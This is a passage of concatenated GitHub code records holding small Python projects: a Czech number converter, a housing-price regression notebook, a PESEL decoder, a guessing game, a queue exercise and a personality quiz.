     {\n                            'type': 'section',\n                            'text': {\n                                'type': 'plain_text',\n                                'text': 'dynamo_to_slack error\\n{message}'.format(\n                                    message=traceback.format_exc()\n                                )\n                            }\n                        }\n                    ]\n                }\n            )\n        )\n\n    finally:\n        return event","repo_name":"roodolv/feedly2slack_lambda","sub_path":"db2slack/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23472793369","text":"\"\"\"\nHW03\nASSIGNMENT:\nWrite a program numbers.py for task HW03 that reads a line from standard input \nwhich contains either a number in decimal notation or a number written out in words without diacritics, e.g. dvestepadesatsedmtisictristasedmdesatpet, and converts that number into the opposite notation. \nIf the input matches neither of these options, it prints 'ERROR' and exits.\nInput dvestepadesatsedmtisictristasedmdesatpet gives output 257375\nInput 543210 gives output petsetctyricettritisicedvestedeset\nAll numbers are whole numbers in the range 1 to 999999.\nThe following words are used for numbers written out in words: \njeden, dva, tri, ctyri, pet, sest, sedm, osm, devet, deset, jedenact, dvanact, trinact, ctrnact, patnact, sestnact, sedmnact, osmnact, devatenact, dvacet, tricet, ctyricet, padesat, sedesat, sedmdesat, osmdesat, devadesat, sto, dveste, trista, ctyrista, petset, sestset, sedmset, osmset, devetset, tisic, tisice.\n\nNote: In Czech the correct form is “dvatisice”, but one may also write “stodvatisic” and “stodvatisice”. 
We require the solution in the form “stodvatisice”.\n\"\"\"\n\n\"\"\"\nAn absolute mess of the biggest caliber!!!!\n\"\"\"\n\ncisla1 = ['jeden', 'dva', 'tri', 'ctyri', 'pet', 'sest', 'sedm', 'osm', 'devet']\ncisla1num = [i for i in range(1,11)]\ncisla11 =['deset','jedenact', 'dvanact','trinact', 'ctrnact', 'patnact', 'sestnact', 'sedmnact', 'osmnact', 'devatenact']\ncisla11num = [i for i in range(10,20)]\ncisla10 = ['dvacet', 'tricet', 'ctyricet', 'padesat', 'sedesat', 'sedmdesat', 'osmdesat', 'devadesat']\ncisla10num = [i for i in range (20,100,10)]\ncisla100 =['sto', 'dveste', 'trista', 'ctyrista', 'petset', 'sestset', 'sedmset', 'osmset', 'devetset']\ncisla100num= [i for i in range (100, 1000,100)]\ncisla1000=['tisice', 'tisic']\n\nitterable = [cisla100, cisla100num, cisla10, cisla10num, cisla11, cisla11num, cisla1, cisla1num]\n\ndef checklength (substring):\n    if (len(substring)<2):\n        return True\n    else:\n        return False\n\ndef iterateArray (array, substring):\n    for num in array:\n        if (substring.find(num) != -1):\n            return array.index(num)\n\ndef addNum (index, arraynum,output):\n    output +=arraynum [index]\n    return output\n\ndef sliceString (index, array,substring):\n    substring = substring[len(array[index]):]\n    return substring\n\n\n#print (iterateArray(cisla100,\"dvestepadesat\"))\n\ndef make100(vstup):\n    \n    substring = vstup\n    output =0\n    \n    \n    for i in range (0,8,2):\n        index=iterateArray(itterable [i],substring)\n        \n        if not (index == None):\n            output = addNum(index, itterable [i+1], output)\n            substring =sliceString(index, itterable [i], substring)\n            \n    if (checklength(substring)):\n        return output\n    \n\n    \n\ndef getDecimal(stringnum):\n    # find the position of \"tisic\" (thousand)\n    a = stringnum.find(\"tisic\")\n    output =0\n    \n    if (a != -1):\n        \n        preffix = make100(stringnum[:a]) \n        if (preffix ==0):\n            preffix =1\n        \n        suffix = make100(stringnum[a+5:]) \n        output = preffix * 1000 +suffix\n        \n    else:\n        suffix = make100(stringnum) \n        output = output +suffix\n    \n    return (output)\n\n\ndef getWord (num):\n    num = int(num)\n    output = ''\n    digits =[]\n\n    \n    for i in range (6): \n        digits.append(int(num%10))\n        num=int(num/10)\n    \n    \n\n    if (digits[0] != 0):\n        output=cisla1[digits[0]-1]\n    \n    \n    if (digits[1] != 0):\n        \n        if (digits [1] ==1) : \n            output =cisla11[digits[0]]\n        \n        else:\n            output = cisla10[digits[1]-2]+output\n    \n    \n    if(digits[2] != 0):\n        output = cisla100[digits[2]-1]+output\n    \n    \n    if (digits[3] != 0):\n        \n        \n        if (digits [4] ==0 and digits [5] ==0):\n            #2000 3000\n            if (digits [3]==2 or digits [3]==3 or digits [3]==4):\n                output = cisla1[digits[3]-1]+\"tisice\"+output\n            #5000\n            else:\n                output = cisla1[digits[3]-1]+\"tisic\"+output\n        #11000,513000    \n        elif (digits[4] == 1):\n            output =cisla11[digits[3]]+\"tisic\"+output\n            \n        elif (digits [4]==0):\n            if (digits [3]==2 or digits [3]==3 or digits [3]==4):\n                output = cisla1[digits[3]-1]+\"tisice\"+output\n            #5000\n            else:\n                output = cisla1[digits[3]-1]+\"tisic\"+output\n            \n            \n        else:\n            #53000,136000\n            \n            if (digits [3]==2 or digits [3]==3 or digits [3]==4):\n                output = cisla10[digits[4]-2]+ (cisla1[digits[3]-1]+\"tisice\"+output)\n            #5000\n            else:\n                output = cisla10[digits[4]-2]+ (cisla1[digits[3]-1]+\"tisic\"+output) \n        \n        \n    elif (digits [3]== 0):\n        \n        \n        if (digits[4] == 1):\n            output =\"desettisic\"+output\n        \n        elif (digits[4]!= 0):\n            output = cisla10[digits[4]-2]+\"tisic\"+output\n            \n    \n    \n    if(digits[5] != 0):\n        \n        if (digits [4]==0 and digits[3]==0):\n            \n            output = cisla100[digits[5]-1]+ \"tisic\"+output\n        \n        else:\n            output = cisla100[digits[5]-1]+ output    \n    \n    return output 
\n\n \n\n\"\"\"\nprint(getWord(900000))print( getDecimal(\"dvestepadesatsedmtisictristasedmdesatpet\"))\nprint( getDecimal(\"petsetctyricettritisicedvestedeset\"))\nprint( getDecimal(\"dvatisicepetsetdevet\"))\nprint( getDecimal(\"tisicsedmset\" )) \"\"\"\n\n \nvstup = input()\nisNumber =False\nisAllowed = True\n\n\nasci =ord(vstup[0])\nif ((asci >= 48 and asci <=57)):\n isNumber = True \n \nfor i in range (1,len(vstup)):\n asci =ord(vstup[i])\n if (isNumber):\n \n if not(asci >= 48 and asci <=57):\n isAllowed = False\n break\n \n else:\n if not (asci >= 97 and asci <=122):\n isAllowed =False\n break\n\n\nif not (isNumber):\n substring = vstup\n for i in range (0,8,1):\n #every array must be itterate 2 times\n if (i%2 ==1):\n i -= 1\n index=iterateArray(itterable [i],substring)\n if (index != None):\n ind =substring.find (itterable [i][index])\n substring = substring[:ind] + substring [ind + len(itterable[i] [index]):]\n \n \n if ((len(substring)== 0 or substring ==\"tisic\"or substring ==\"tisice\")and (isAllowed)):\n print(getDecimal(vstup))\n else: \n print(\"ERROR\")\n \nelif (isAllowed):\n print(getWord(vstup))\nelse: \n print(\"ERROR\")\n \n\n\n \n \n\ncisla1 = {\n 'jeden': 1, \n 'dva': 2, \n 'tri': 3, \n 'ctyri': 4, \n 'pet': 5, \n 'sest': 6, \n 'sedm': 7, \n 'osm': 8, \n 'devet': 9}\ncisla10 ={\n 'deset': 10, \n 'jedenact': 11, \n 'dvanact': 12, \n 'trinact': 13, \n 'ctrnact': 14, \n 'patnact': 15, \n 'sestnact': 16, \n 'sedmnact': 17, \n 'osmnact': 18, \n 'devatenact': 19,\n 'dvacet': 20, \n 'tricet': 30, \n 'ctyricet': 40, \n 'padesat': 50, \n 'sedesat': 60, \n 'sedmdesat': 70, \n 'osmdesat': 80, \n 'devadesat': 90}\ncisla100 ={\n 'sto': 100, \n 'dveste': 200, \n 'trista': 300, \n 'ctyrista': 400, \n 'petset': 500, \n 'sestset': 600, \n 'sedmset': 700, \n 'osmset': 800, \n 'devetset': 900}\ncisla1000={\n 'tisic': 1000, \n 'tisice': 1000}\n\n\n\n\n\n \n\n\n\n","repo_name":"stefkalad/B3B33ALP","sub_path":"HW/HW03/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43006497374","text":"from random import choice\ncounter = 0\ni=0\nwhile counter <100:\n print(counter)\n counter = counter + choice(range(10))\n i = i+1\nprint(\"number of counts = \", i)\n\npop = 100\nyear = 0\nwhile 1:\n pop = pop*1.1\n year =year+1\n if pop>1000:\n break\nprint(\"Final pop =\", pop)\nprint(\"Years it takes =\", year)\n","repo_name":"tsatsa-ChemE/chem160module3","sub_path":"whiles.py","file_name":"whiles.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"49677612","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Real Estate Price Predictor\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\n#data frame name housing\nhousing=pd.read_csv(\"data.csv\")\nhousing.head()\n\n\n# In[3]:\n\n\nhousing.info()\n#help in checking missing data\n\n\n# In[4]:\n\n\nhousing[\"CHAS\"].value_counts()\n#0 in how many entries and 1 in how many entries\n\n\n# In[5]:\n\n\nhousing.describe()\n#from count we know the number of row shaving null values\n\n\n# In[6]:\n\n\nhousing.tail()\n\n\n# In[7]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n#to visualise graph here only\n\n\n# In[8]:\n\n\nimport matplotlib.pyplot as plt\n\n\n# In[9]:\n\n\n# housing.hist(bins=50,figsize=(20,15))\n# #dont need plt.show()in jupyter\n\n\n# ## Train-Test Splitting\n\n# 
In[10]:\n\n\n# import numpy as np \n\n# #np.random.seed(42) means as many times u run it will remain same\n# #dont use random bcz test data will showed in training data when ever executing aprogram\n# #to avoid overfitting model will memorise all data\n# def split_train_test(data,test_ratio):\n# np.random.seed(42)\n# shuffled=np.random.permutation(len(data))\n# test_set_size=int(len(data)*test_ratio)\n# test_indices=shuffled[:test_set_size]\n# train_indices=shuffled[test_set_size:]\n# return data.iloc[train_indices],data.iloc[test_indices]\n\n\n# In[11]:\n\n\n# train_set,test_set=split_train_test(housing,0.2)\n\n\n# In[12]:\n\n\nfrom sklearn.model_selection import train_test_split\n\ntrain_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)\n\nprint(f\"Rows in test set: {len(test_set)} Rows in train set: {len(train_set)}\")\n\n\n# In[13]:\n\n\n#If CHAS is an important feature if it is on equal part train and test data shouold represent total population\n#so use stratified sampling\nfrom sklearn.model_selection import StratifiedShuffleSplit\nsplit=StratifiedShuffleSplit(n_splits=1,test_size=0.2,random_state=42)\nfor train_index,test_index in split.split(housing,housing[\"CHAS\"]):\n strat_train_set=housing.loc[train_index]\n strat_test_set=housing.loc[test_index]\n\n\n# In[14]:\n\n\nstrat_train_set.info()\n\n\n# In[15]:\n\n\nstrat_test_set[\"CHAS\"].value_counts()\n\n\n# In[16]:\n\n\nstrat_train_set[\"CHAS\"].value_counts()\n\n\n# In[17]:\n\n\nhousing=strat_train_set.copy()\n\n\n# ## Looking For Correlations\n\n# In[18]:\n\n\n#inbuilt function in pandas to generate corelation matrix\ncorr_matrix=housing.corr()\n\n\n# In[19]:\n\n\n#see pearson corelation matrix 1 refers to high corelation lie betn -1 to +1 seee +ve and -ve corelation\ncorr_matrix['MEDV'].sort_values(ascending=False)\n\n\n# In[20]:\n\n\n# from pandas.plotting import scatter_matrix\n# #plot only strong relation values\n# attributes=[\"MEDV\",\"RA\",\"ZN\",\"LSTAT\"]\n# scatter_matrix(housing[attributes],figsize=(12,8))\n\n\n# In[21]:\n\n\n# housing.plot(kind=\"scatter\",x=\"RA\",y=\"MEDV\",alpha=0.8)\n\n\n# In[22]:\n\n\n#we can remove the outliers\nhousing[\"TAXRA\"]=housing[\"TAX\"]/housing[\"RA\"]\nhousing.head()\n\n\n# In[23]:\n\n\n# attributes=[\"MEDV\",\"RA\",\"ZN\",\"LSTAT\"]\n# scatter_matrix(housing[attributes],figsize=(12,8))\n\n\n# In[24]:\n\n\n# housing.plot(kind=\"scatter\",x=\"TAX\",y=\"MEDV\",alpha=0.8)\n\n\n# In[25]:\n\n\nhousing=strat_train_set.drop(\"MEDV\",axis=1)\nhousing_labels=strat_train_set[\"MEDV\"].copy()\n\n\n# # #Taking Care Of Missing DATA\n\n# In[26]:\n\n\na=housing.dropna(subset=[\"RA\"])\na.shape\n# here housing data frame is not changed to change it pass inplace=True inside bracket\n\n\n# In[27]:\n\n\n#option2\nhousing.drop(\"RA\",axis=1).shape\n# there will be no RA coulmn shown but originally is not changed\n\n\n# In[28]:\n\n\n# option 3 replace with median mean or mode\nmedian=housing[\"RA\"].median()\nhousing[\"RA\"].fillna(median)\n\n\n# In[29]:\n\n\nhousing.shape\n\n\n# In[30]:\n\n\nhousing.describe()\n# before starting imputer\n\n\n# In[31]:\n\n\n#if test set have missing data\nfrom sklearn.impute import SimpleImputer\nimputer=SimpleImputer(strategy=\"median\");\nimputer.fit(housing)\n# fit imputer to housing data\n\n\n# In[32]:\n\n\nimputer.statistics_\n# reeplace every null value with median in every attribute\n\n\n# In[33]:\n\n\nX=imputer.transform(housing)\n\n\n# In[34]:\n\n\nhousing_tr=pd.DataFrame(X,columns=housing.columns)\n#transformed missing value of 
missing data\n\n\n# In[35]:\n\n\nhousing_tr.describe()\n\n\n# ## SK learn Library \n\n# In[36]:\n\n\n#sk learn has 3 objects\n# 1 Estimators-It estimates some parameter based on a data set like imputer\n# it has a fit method and transform method\n#Fit-method-Fits The Data SEt and Calculates Internal Parameter has hyper parameter like strategy\n#Transform Method-Take input and returns outp\n#Tra\n\n\n# In[37]:\n\n\n# building pipeline and before it automate the data set\n\n\n# ## Feature Scaling\n\n# In[38]:\n\n\n# primarily 2 types of feature scaling Method\n# 1.Min-max Scaling(Normalisation)\n# (value-min)/(max-min)\n# here value lie in certain range ie from 0 to 1\n# Sklearn provides MinMAxScaler for this\n# 2.Standardisation\n# (value-mean)/standarddeviation\n# Sklearn provides StandardScaler for this\n\n\n\n# In[39]:\n\n\nfrom sklearn.pipeline import Pipeline\n# feature scaling scale feature value to cer \nfrom sklearn.preprocessing import StandardScaler\n# add as many things in pipeline ,pipeline takes a string\nmy_pipeline=Pipeline([(\"imputer\",SimpleImputer(strategy=\"median\")),\n (\"std_scaler\",StandardScaler())])\n\n\n# In[40]:\n\n\nhousing_num_tr=my_pipeline.fit_transform(housing)\n#every process u done must be in pipeline so transform before imputed data to the pipe line \n\n\n# In[41]:\n\n\nhousing_num_tr\n#it is an numpy array predictor use numpy array as input\n\n\n# ## Selecting A Desired Model\n\n# In[42]:\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n# model=LinearRegression()\n# model=DecisionTreeRegressor()\nmodel=RandomForestRegressor()\nmodel.fit(housing_num_tr,housing_labels)\n\n\n# In[43]:\n\n\nsome_data=housing.iloc[:5]\nsome_labels=housing_labels.iloc[:5]\nprepared_data=my_pipeline.transform(some_data)\nmodel.predict(prepared_data)\n\n\n# In[44]:\n\n\nlist(some_labels)\n\n\n# ## Evaluating The Model\n\n# In[45]:\n\n\nfrom sklearn.metrics import mean_squared_error\nhousing_predictions=model.predict(housing_num_tr)\nmse = mean_squared_error(housing_labels,housing_predictions)\nrmse = np.sqrt(mse)\n\n\n# In[46]:\n\n\nrmse\n# it has 0 errror bcz it deeply understand the model and got over fitted also learned the noise \n\n\n# ## Using Better Evaluation Technique And Cross Validation\n\n# In[47]:\n\n\n#1 2 3 4 5 67 8 9 \nfrom sklearn.model_selection import cross_val_score\nscores=cross_val_score(model,housing_num_tr,housing_labels,scoring=\"neg_mean_squared_error\",cv=10)\n#do or 10 folds our scores here negative\nrmse_scores=np.sqrt(-scores)\nrmse_scores\n# for prices to have 24 32 36 etc 4 to 5 error is ok\n\n\n# In[48]:\n\n\ndef print_scores(scores):\n print(\"Scores:\",scores)\n print(\"Mean:\",scores.mean())\n print(\"standard Deviation:\", scores.std())\n\n\n# In[49]:\n\n\nprint_scores(rmse_scores)\n\n\n# ## Saving The Model\n\n# In[52]:\n\n\nfrom joblib import dump, load\ndump(model, \"RealEstate.joblib\")\n\n\n# ## TESTING THE MODEL\n\n# In[55]:\n\n\nX_test=strat_test_set.drop(\"MEDV\",axis=1)\nY_test=strat_test_set[\"MEDV\"].copy()\nX_test_prepared=my_pipeline.transform(X_test)\nfinal_predictions=model.predict(X_test_prepared)\nfinal_mse=mean_squared_error(Y_test,final_predictions)\nfinal_rmse=np.sqrt(final_mse)\n#print(final_predictions,list(Y_test))\n\n\n# In[56]:\n\n\nfinal_rmse\n\n\n# In[57]:\n\n\nprepared_data[0]\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"devaaman/Real_Estate_Price_predictor","sub_path":"ml project/Real estate.py","file_name":"Real 
estate.py","file_ext":"py","file_size_in_byte":7342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74923135529","text":"import os\n\n\ndef checkPesel():\n odczyt = []\n dane = []\n pesel = str\n deszyfrFile = open(\"PESEL_INFO.txt\", \"w+\")\n \n if os.path.isfile(\"PESEL.txt\"): # Jeśli uda się otworzyć\n with open(\"PESEL.txt\", \"r\") as file:\n odczyt = file.readlines() # Odczytuje każdą linijkę pliku\n \n for i in range(len(odczyt)):\n pesel = odczyt[i]\n pesel = pesel.replace(\"\\n\", \"\") # Usuwamy znaki końca linii\n \n if (len(pesel) == 11): # Sprawdza czy pesel ma odpowiednią liczbę znaków\n dane.append(pesel)\n\n for i in range(len(dane)):\n pesel = dane[i]\n gender = str\n year = int(pesel[0:2])\n month = int(pesel[2:4])\n day = int(pesel[4:6])\n \n if month - 20 >= 1:\n year += 2000\n else:\n year += 1900\n \n if (pesel[9]) in \"02468\": # Jeżeli na pozycji 9 jest liczba parzysta, to płeć = kobieta\n gender = \"K\"\n else:\n gender = \"M\"\n \n deszyfrFile.write(\n pesel\n + \":\\ndata urodzenia: {0}-{1}-{2};\".format(year, month, day)\n + \"\\tpłeć: {0}\".format(gender)\n + \"\\n\\n\"\n )\n\n\ncheckPesel()\n","repo_name":"tTargiel/UNI-Python-Programming","sub_path":"Lista 08/zadanie_04.py","file_name":"zadanie_04.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"927704267","text":"from typing import Union\ntry:\n from typing import Literal\nexcept:\n from typing_extensions import Literal\n\nNUM = Union[int, float]\n\nLENSID = Union[int, str]\n\nSPECIES_LIST = Literal[\"human\", \"mouse\", \"rat\", \"zebrafish\", \"fly\",\n \"m_fascicularis\", \"other\"]\nOMICS_LIST = Literal[\"RNA\", \"ADT\", \"PRTB\", \"spatial\", \"NA\"]\nUNIT_TYPE_LIST = Literal[\"norm\", \"raw\"]\nUNIT_TRANSFORM_LIST = Literal[\"none\", \"log2\"]\nUNIT_LIST = Literal[\"umi\", \"lognorm\", \"read\", \"cpm\", \"tpm\", \"rpkm\", \"fpkm\",\n \"unknown\"]\nINPUT_FORMAT_LIST = Literal[\"fullmatrix\", \"mtx\", \"h5matrix\",\n \"crisprfullmatrix\", \"visium\", \"h5visium\", \"bcs\",\n \"seurat\", \"scanpy\", \"loomamgen\", \"fastq\",\n \"csv\", \"txt\", \"tsv\", \"nanostring\", \"dsp\"] # No UPPER CASE allowed for backward compatibility purpose\nNORMALIZATION_LIST = Literal[\"none\", \"lognorm\"]\n\nMETADATA_TYPE_LIST = Literal[\"category\", \"numeric\"]\nFEATURE_TYPES = Literal[\"RNA\", \"ADT\", \"PRTB\"]\nUNASSIGNED = \"Unassigned\"\nMETADATA_TYPE_NUMERIC = \"numeric\"\nMETADATA_TYPE_CATEGORICAL = \"category\"\nBIOTURING_UNASSIGNED = \"Unassigned\"\n\nLENS_MODE = Literal[\"PRIVATE\", \"PUBLIC\"]\nLENS_IMAGE_TYPE = Literal[\"truecolor\", \"multiplex\"]\n\nBATCH_CORRECTION = Literal[\"none\", \"harmony\", \"cca\", \"mnn\"]","repo_name":"bioturing/bbrowser_python_studyio","sub_path":"walnut/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18749333668","text":"import time\nimport random\n\ndef get_numbers():\n while True:\n yield random.randint(0, 26)\n\nspeed = get_numbers()\n\nspeed_history = []\n\nwhile True:\n current_speed = next(speed)\n if speed_history:\n previous_speed = speed_history[-1]\n if current_speed < previous_speed:\n print(\"Speed decreasing\")\n else:\n print(\"Speed not decreasing\")\n print(\"Current: \" + str(current_speed))\n print(\"Previous: \" + str(speed_history[-1]))\n else:\n 
print(\"Current: \" + str(current_speed))\n speed_history.append(current_speed)\n \n time.sleep(.5)","repo_name":"MagnusLaue/132-Project","sub_path":"decreasing.py","file_name":"decreasing.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7921779698","text":"import random\r\ndef jogar():\r\n\r\n\r\n print(\"---------------------------------\")\r\n print(\"Bem vindo ao jogo de adivinhação\")\r\n print(\"---------------------------------\")\r\n\r\n numero_secreto = random.randrange(1,101)\r\n tentativas = 0\r\n pontos = 1000\r\n\r\n print (\"NÍVEIS DE DIFICULDADE\")\r\n print (\" (1) Fácil (2) Médio (3) Díficil\")\r\n nivel = int(input(\"Escolha o nível : \"))\r\n\r\n if(nivel == 1):\r\n tentativas = 20\r\n elif(nivel == 2):\r\n tentativas = 10\r\n elif(nivel ==- 3):\r\n tentativas == 5\r\n\r\n\r\n for rodada in range(1, tentativas + 1):\r\n\r\n print(\"Tentativa {} de {}\".format(rodada, tentativas))\r\n\r\n chute_str = input(\"Digite um número de 1 à 100: \")\r\n print(\"Você digitou \", chute_str)\r\n chute = int(chute_str)\r\n\r\n if(chute < 1 or chute > 100 ):\r\n print(\"Seu número é inválido, digite novamente!\")\r\n continue\r\n\r\n\r\n\r\n acertou = numero_secreto == chute\r\n errou_maior = numero_secreto < chute\r\n errou_menor = numero_secreto > chute\r\n\r\n if (acertou):\r\n print(\"ACERTOU\")\r\n print(\"Sua pontuação foi de {}\".format(pontos))\r\n print(\"-------------------------------------------------\")\r\n break\r\n else:\r\n if (errou_maior):\r\n print(\"ERROU! Seu chute está maior que o número secreto\")\r\n print(\"-------------------------------------------------\")\r\n elif (errou_menor):\r\n print(\"ERROU! Seu chute está menor que o número secreto\")\r\n print(\"-------------------------------------------------\")\r\n pontos_perdidos = abs(numero_secreto - chute)\r\n pontos = pontos - pontos_perdidos\r\n\r\n\r\n print(\"O número era {}\".format(numero_secreto))\r\n print(\"Fim do jogo!\")\r\n\r\nif (__name__ == \"__main__\"):\r\n jogar()","repo_name":"GabrielFaustinoIT/Python-3","sub_path":"Jogos/adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74245146088","text":"class Animal:\n def __init__(self,type,name) :\n self.type = type\n self.name = name\n def __str__(self) -> str:\n return self.name\n\nclass queue:\n def __init__(self) :\n self.list = []\n def __str__(self) :\n result = [str(animal) for animal in self.list]\n print(result) \n return \"Data printed\"\n def enqueue(self,animal):\n self.list.append(animal)\n\n def isempty(self):\n return True if len(self.list)==0 else False \n\n def sepecific_dequeue(self,type):\n if not self.isempty() :\n for index in range(len(self.list)):\n \n if self.list[index].type ==type:\n popanimal = self.list.pop(index)\n return popanimal.type\n\n def dequeue(self):\n if not self.isempty():\n popanimal = self.list.pop(0)\n return popanimal.name\n\n\nDog1 = Animal('Dog','Dog1') \nCat1 = Animal('Cat','Cat1')\nDog2 = Animal('Dog','Dog2') \nCat2 = Animal('Cat','Cat2')\nDog3 = Animal('Dog','Dog3')\nCat3 = Animal('Cat','Cat3')\nCat4 = Animal('Cat','Cat4')\nDog4 = Animal('Dog','Dog4')\nCat5 = Animal('Cat','Cat5')\n\nqueueanimal = 
queue()\nqueueanimal.enqueue(Dog1)\nqueueanimal.enqueue(Dog2)\nqueueanimal.enqueue(Cat1)\nqueueanimal.enqueue(Dog3)\nqueueanimal.enqueue(Cat2)\nqueueanimal.enqueue(Dog4)\nqueueanimal.enqueue(Cat3)\nqueueanimal.enqueue(Cat4)\n\nprint(queueanimal)\nprint(queueanimal.dequeue())\nprint(queueanimal)\nprint(queueanimal.sepecific_dequeue('Cat'))\nprint(queueanimal)\n\n \n","repo_name":"Akashsahoo/DSQUEUE","sub_path":"Question/Dogcatqueue.py","file_name":"Dogcatqueue.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29952745085","text":"from random import shuffle\nimport time\n\ndef personality(choices):\n\tquestion_list =[Question(\"I like to work on many tasks at the same time instead of focusing on one.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Introvert\", \"Extrovert\"),\n\t\t\t\t\tQuestion(\"I tend to discuss big decisions with most of my friends.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Introvert\", \"Extrovert\"),\n\t\t\t\t\tQuestion(\"I prefer to take some alone time for myself when I can get it.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Extrovert\", \"Introvert\"),\n\t\t\t\t\tQuestion(\"At a party, I'd prefer to talk to one close friend rather than a crowd.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Extrovert\", \"Introvert\"),\n\t\t\t\t\tQuestion(\"In my free time, I'd choose to go meet with a social group over staying home.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Introvert\", \"Extrovert\"),\n\t\t\t\t\tQuestion(\"I like to think through things myself rather than bounce ideas off of lots of people.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Extrovert\", \"Introvert\"),\n\n\t\t\t\t\tQuestion(\"When approaching a new project, I like to see the big picture before considering the details.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Sensing\", \"Intuition\"),\n\t\t\t\t\tQuestion(\"I think it's fun to think through a lot different possibilities rather than focus on a single opportunity.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Sensing\", \"Intuition\"),\n\t\t\t\t\tQuestion(\"If I'm dealing with a situation I've encountered before, I'd rather just handle it the same way as last time instead of wasting time thining of new solutions.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Intuition\", \"Sensing\"),\n\t\t\t\t\tQuestion(\"I notice small details easily.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Intuition\", \"Sensing\"),\n\t\t\t\t\tQuestion(\"I'd rather focus on the reality of a situation than play through the possibilities of what could be.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Intuition\", \"Sensing\"),\n\t\t\t\t\tQuestion(\"When playing a new game, I usually pick up on the rules pretty quickly just from playing.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Sensing\", \"Intuition\"),\n\n\t\t\t\t\tQuestion(\"I usually understand how people are feeling without having to ask.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Thinking\", \"Feeling\"),\n\t\t\t\t\tQuestion(\"I prefer to follow the rules, even when it can adversely affect me.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Feeling\", \"Thinking\"),\n\t\t\t\t\tQuestion(\"I tend to trust my head over my heart.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Feeling\", \"Thinking\"),\n\t\t\t\t\tQuestion(\"When making a large decision, I make a point of considering how it will affect those around me.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Thinking\", \"Feeling\"),\n\t\t\t\t\tQuestion(\"I'd rather make the right choice and hurt someone's feelings a little than make 
the wrong choice.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Feeling\", \"Thinking\"),\n\t\t\t\t\tQuestion(\"I'd rather play a game with my close friends where we all work together than compete to have a winner and losers.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Thinking\", \"Feeling\"),\n\n\t\t\t\t\tQuestion(\"I'd rather have an agenda before agreeing to a trip with coworkers or friends.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Perceiving\", \"Judging\"),\n\t\t\t\t\tQuestion(\"I like to leave my schedule open in case something I want to do comes up.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Judging\", \"Perceiving\"),\n\t\t\t\t\tQuestion(\"When building something, I try it myself before looking at the included instructions.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Judging\", \"Perceiving\"),\n\t\t\t\t\tQuestion(\"I'd rather turn in work on time, even if it's not my best.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Perceiving\", \"Judging\"),\n\t\t\t\t\tQuestion(\"I think games can only fun if people play by the rules.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Perceiving\", \"Judging\"),\n\t\t\t\t\tQuestion(\"If I'm on my way to dinner at a restaurant I know and see one that my friends have said they love, I'll go there instead of where I planned to go.\", \"mb\", \"Disagree\", \"Agree\", 0, \"Judging\", \"Perceiving\")]\n\n\tanswers = []\n\tresults = {\"Introvert\" : 0, \"Extrovert\" : 0, \"Intuition\" : 0, \"Sensing\" : 0, \"Thinking\" : 0, \"Feeling\" : 0, \"Judging\" : 0, \"Perceiving\" : 0}\n\tsymbols = {\"Introvert\" : 'I', \"Extrovert\" : 'E', \"Intuition\" : 'N', \"Sensing\" : 'S', \"Thinking\" : 'T', \"Feeling\" : 'F', \"Judging\" : 'J', \"Perceiving\" : 'P'}\n\ttypes = ['Introvert', 'Extrovert', 'Intuition', 'Sensing', 'Thinking', 'Feeling', 'Judging', 'Perceiving']\n\tpersonality_type = {}\n\tpersonality_code = ''\n\tscale = 7\n\n\tif choices != None and len(choices) == len(question_list):\n\t\tfor x in range(len(choices)):\n\t\t\tquestion_list[x].set_value((choices[x]-1)*(100/(scale-1)))\n\n\telse:\n\t\t# Shuffle questions\n\t\t# shuffle(question_list)\n\n\t\t# Ask each question and record the answer in the question\n\t\tfor question in 